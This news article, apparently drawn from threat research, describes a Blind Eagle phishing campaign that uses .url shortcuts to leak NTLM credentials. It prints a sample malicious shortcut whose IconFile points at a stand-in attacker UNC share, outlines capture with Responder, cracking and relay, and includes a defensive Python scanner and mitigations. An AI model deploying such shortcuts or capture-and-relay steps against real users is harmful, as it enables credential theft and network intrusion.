
The threat actor group known as Blind Eagle (also tracked as APT-C-36) has launched a campaign against organizations primarily in South America that relies on a new initial-access vector.
The group, known for its persistent targeting of Colombian entities, has added weaponized .url shortcut files to its toolkit, crafted so that simply opening them leaks the victim's NTLM authentication credentials to an attacker-controlled server.
The method pairs social engineering (a plausible shortcut file delivered by email) with a Windows file-handling behaviour that needs no exploit code, giving the attackers credential material they can use to compromise corporate networks and reach sensitive information.
The attack begins with spear-phishing emails carrying seemingly innocuous .url shortcut files that look legitimate to the recipient.
When opened, these files make Windows connect to a server controlled by the threat actors and authenticate to it with the logged-on user's credentials, so the victim's machine hands over an NTLM challenge-response (commonly called a Net-NTLMv2 hash) without any further interaction.
The technique itself is not new in the security field, but Blind Eagle has refined its delivery and infrastructure to slip past common email controls and evade detection by conventional security tools.
Analysts at Check Point Research identified this campaign in early 2025, noting that the group has significantly refined their techniques compared to previous operations.
Their detailed analysis revealed that the attack has primarily targeted financial institutions, government agencies, and manufacturing organizations across Colombia, Ecuador, and Peru, with evidence suggesting potential expansion to other regions.
The technical mechanism behind this attack lies in the manipulation of the .url file format to trigger an automatic SMB authentication attempt to a malicious server.
When a user opens the weaponized .url file, Windows attempts to load an icon from the specified location, which the attackers have configured to point to their command-and-control server.
(Figure: the complete attack flow from email delivery to hash extraction.)
Blind Eagle Attack Analysis
The weaponized .url files contain code specifically crafted to ensure the victim’s system attempts authentication to an attacker-controlled SMB server.
Examination of the malicious .url files reveals a structure similar to the following:
[InternetShortcut]
URL=https://legitimate-looking-website.com
IconFile=\\attacker-server\share\icon.ico
IconIndex=0
When the victim opens this file, Windows automatically tries to retrieve the icon from the UNC path in IconFile, and in doing so performs NTLM authentication to the attacker's host, disclosing the user's NTLM challenge-response (the Net-NTLMv2 hash) before the user has clicked anything inside the shortcut.
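The following Python script is an added example (not code from Check Point Research or from the campaign) that triages .url files the way an email gateway or EDR rule could: it parses the INI-style shortcut and flags any IconFile, URL or WorkingDirectory value that resolves to a UNC path or a file:// host, because those are the values that make Windows authenticate to a remote server. The sample shortcuts, host names and severity labels are constructed for the example; the parser also accepts the long-path UNC prefix and forward-slash spellings that Windows tolerates.

```python
import re
from typing import Dict, List, Tuple

# Three constructed .url files (sample host names, not campaign indicators).
WEAPONIZED_URL = r"""[InternetShortcut]
URL=https://legitimate-looking-website.com
IconFile=\\attacker-server\share\icon.ico
IconIndex=0
"""

BENIGN_URL = r"""[InternetShortcut]
URL=https://intranet.example.internal/portal
IconFile=C:\Program Files\Internet Explorer\iexplore.exe
IconIndex=1
"""

# Variant whose URL itself is a remote share: nothing happens on render,
# but a single click triggers the same NTLM authentication.
CLICK_TO_AUTH_URL = r"""[InternetShortcut]
URL=file://files.example.net/docs/invoice.pdf
"""

WATCHED_KEYS = ("iconfile", "url", "workingdirectory")
# \\host\... or \\?\UNC\host\... (case-insensitive); captures the host.
_UNC_HOST = re.compile(r"^\\\\(?:\?\\unc\\)?([^\\]+)(?:\\|$)", re.IGNORECASE)


def parse_url_file(text: str) -> Dict[str, Dict[str, str]]:
    """Lenient INI parse, roughly as Windows reads it: {section: {key (lower): value}}.
    Hand-rolled instead of configparser so '%' in URLs and odd sections do not raise."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def remote_host(value: str) -> str:
    """Return the host a value points at when it is a UNC path or a file:// URL
    with a host, else ''. Forward slashes and the long-path prefix are normalised."""
    v = value.strip().strip('"').replace("/", "\\")
    if v.lower().startswith("file:"):
        v = v[5:]
    m = _UNC_HOST.match(v)
    if not m:
        return ""
    host = m.group(1)
    # file://C:/... collapses to \\C:\..., a local drive rather than a host.
    if re.fullmatch(r"[A-Za-z]:", host) or host.lower() in ("localhost", "127.0.0.1", "::1"):
        return ""
    return host


def scan_url_file(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, host, severity) per remote reference. IconFile is 'high' because
    Explorer fetches it just to draw the icon; URL/WorkingDirectory need a click."""
    findings = []
    shortcut = parse_url_file(text).get("internetshortcut", {})
    for key in WATCHED_KEYS:
        host = remote_host(shortcut.get(key, ""))
        if host:
            findings.append((key, host, "high" if key == "iconfile" else "medium"))
    return findings


if __name__ == "__main__":
    samples = (("weaponized", WEAPONIZED_URL), ("benign", BENIGN_URL), ("click-to-auth", CLICK_TO_AUTH_URL))
    for name, sample in samples:
        print(name, scan_url_file(sample) or "clean")
```

Run against a mail quarantine, a "high" finding on IconFile is the signature of this campaign's trick: the shortcut never has to be followed for the credential leak to happen.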
The attackers capture these authentication attempts with Responder or a similar rogue SMB listener, which logs each one server-side together with the username, domain, server challenge and the client's NTLMv2 response.
The captured responses can be cracked offline to recover the plaintext password, or relayed while the exchange is live to another service that accepts NTLM (an NTLM relay attack) in order to move laterally within the network. A captured Net-NTLMv2 response is not the NT hash itself, so it cannot be used directly for pass-the-hash; the attacker first has to crack it to the password, which then yields the hash.
The campaign demonstrates sophisticated operational security measures, with the attackers frequently rotating their infrastructure to avoid detection.
The command-and-control servers have been observed using dynamic DNS services and compromised legitimate websites as proxies to hide their true location.
The malicious .url files are typically distributed through targeted emails that mimic legitimate business communications, often referencing invoices, shipping notices or official government correspondence.
Forensic analysis of compromised systems indicates that once the attackers gain initial access using the harvested credentials, they deploy additional payloads, including remote access trojans and information stealers.
The PowerShell commands executed post-compromise by the first-stage payload reveal how the attackers establish persistence and begin reconnaissance within the victim's network.
The researchers have identified several indicators of compromise associated with this campaign, including network connections to suspicious domains and the creation of specific registry keys used for persistence.
Organizations are advised to implement strict email filtering (quarantining .url attachments in particular), block outbound SMB (TCP 445) at the perimeter so workstations cannot authenticate to Internet hosts, restrict outgoing NTLM authentication to remote servers through the "Network security: Restrict NTLM" group policies, require SMB signing to blunt relay of any captured exchange, and keep all systems patched with the latest security updates.